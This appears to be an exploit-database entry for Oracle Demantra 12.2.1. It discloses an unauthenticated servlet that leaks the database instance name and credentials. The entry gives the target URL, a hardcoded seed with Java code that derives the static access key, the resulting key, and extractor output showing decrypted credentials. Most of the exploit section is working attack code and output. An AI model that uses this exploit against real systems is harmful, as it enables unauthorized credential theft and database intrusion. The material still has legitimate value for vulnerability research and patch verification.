Oracle Demantra 12.2.1 - Database Credentials Disclosure

2014-03-0100:00:00

Portcullis

0day.today

0.884 High

EPSS

Percentile

98.7%

JSON

Exploit for windows platform in category web applications

Details:
 
Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:
 
A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:
 
The target URL is:
 
http://target.com:8080/demantra/ServerDetailsServlet?UAK=
 
Now the UAK key is calculated statically:
 
  String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
 
      StringBuffer tmp = new StringBuffer("sge");
      tmp.append(0);
      tmp.append(encryptedPassword);
 
      uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
 
From that information it is possible to create a simple extractor:
 
pixel:demantra user$ java getUAK
-=[Oracle Demantra Database Details Retriever ]=-
 
[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
[+] Retrieved the following encrypted string:
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
[+] Decrypted string is:
TEST?test?demantra?orc?1
 
Together with the authentication bypass this can be exploited unauthenticated as well.

#  0day.today [2018-04-05]  #

0.884 High

EPSS

Percentile

98.7%

JSON

Related for 1337DAY-ID-21967